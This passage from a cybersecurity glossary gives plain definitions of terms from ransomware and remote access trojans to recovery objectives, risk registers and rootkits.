ransomware – a form of malicious software (malware) that prevents or restricts usage of one or more digital devices or applications until a sum of money is paid.
RAT – a remote access tool or remote access trojan are used as forms or components of malware to help attackers gain control over a target computer or other digital device.
recovery point objective (RPO) – the maximum amount of data loss or corruption that can be permitted (often expressed as a time) in the event of a system disruption. This in turn sets the backup and other failsafe requirements for a system. For example, a hotel or air-flight booking system may have a zero tolerance to any data loss (no transactions can be permitted to be lost – because they cannot be recovered through any other means) requiring that the system has an infallible method of logging all transactions, so they can always be recovered.
recovery time objective (RTO) – the targeted amount of days, hours, minutes or seconds that a service, application or process must be restored within, if it is subject to any disruption. This should be based on the availability rating set by the owner (the recovery time objective must not exceed the availability requirement).
red team – when testing for potential exploits on any critical or sensitive system, infrastructure or website, a team of penetration testers is usually used. This term is used to describe the group of penetration testers working together on this type of objective.
reflective (non-persistent) cross-site scripting – a form of web vulnerability that can impact individual users due to security gaps in the design of some web applications. Unwanted and unexpected code (programs) can be run on a user’s machine if they can be persuaded to click or interact with content that may look legitimate, but is in fact a link to malware. This is generally considered a lower risk category because it can only target individual users (not the host application) and requires considerable effort for low return from hackers, plus additional user action. See also persistent (non-reflective) cross site scripting.
residual risk – refers to the remaining possibility of loss and impact after security controls (the risk response) for an item have been applied.
resilience – the ability to remain functional and capable in the face of threat or danger, or to return to function rapidly following any disruption.
risk – a situation involving exposure to significant impact or loss. In formal frameworks, risk can be quantified using probability (often expressed as a percentage) and impact (often expressed as a financial amount). Other parameters for risk can include proximity (how soon a potential risk may be encountered and information about what assets, services, products and processes could be affected).
risk assessment – a systematic process for the proactive detection of potential hazards or gaps on an existing or planned activity, asset, service, application, system or product.
risk-based – an approach that considers the financial impact of a failure, its probability and proximity to determine its’ comparative significance and priority for treatment.
risk register – a central repository that contains entries for each potential, significant loss or damage exposure. Usually there is a minimum materiality threshold, for example a minimum potential financial loss value that must be met or exceeded before an entry in the repository is required. If a risk does occur, it technically becomes an issue (rather than a risk). Issues can continue to be tracked within a risk register until the impact has been successfully managed and the root cause/s have been resolved to the extent that the risk is not likely to repeat,
rogueware – see scareware.
rootkit – a set of software tools that can be used by attackers to gain privileged access and control to the core (root) of the target device. Part of the function of a rootkit usually includes hiding malicious files and processes to help avoid detection and removal of the malware.